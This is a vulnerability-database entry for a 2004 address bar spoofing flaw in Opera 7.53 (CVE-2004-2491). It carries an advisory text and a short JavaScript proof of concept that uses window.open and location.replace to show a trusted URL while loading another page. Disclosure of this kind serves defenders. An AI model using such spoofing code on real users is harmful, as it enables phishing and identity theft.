Lucene search
+L

Opera Web Browser 7.53 - Location Replace URI Obfuscation

🗓️ 27 Jul 2004 00:00:00Reported by bitlance winterType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Security flaw in Opera Web Browser allows address bar spoofing for phishing attacks.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Opera Web Browser < 7.5.4 Multiple Vulnerabilities
20 Aug 200400:00
nessus
nessus
Tenable Nessus
Opera < 7.54 Multiple Function Address Bar Spoofing
9 Aug 200400:00
nessus
cve
CVE
CVE-2004-2491
25 Oct 200504:00
cve
cvelist
Cvelist
CVE-2004-2491
25 Oct 200504:00
cvelist
nvd
NVD
CVE-2004-2491
31 Dec 200405:00
nvd
source: https://www.securityfocus.com/bid/10810/info

Opera Web Browser is prone to a security weakness that may permit malicious web pages to spoof address bar information. This issue is due to a race condition error.

This issue may be leveraged by an attacker to display false information in the address bar of an unsuspecting user, allowing an attacker to present web pages to users that seem to be derived from a trusted location. This may facilitate phishing attacks; attempted theft of user information for the purpose of identity theft.

<script>
function fake() {
 oc=window.open('http://www.opera.com/', '','location=1');
 oc.location.replace('http://www.example.com');
}
[/script]
<a href="javascript:void(0);" onClick="fake()">http://www.opera.com/</a>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation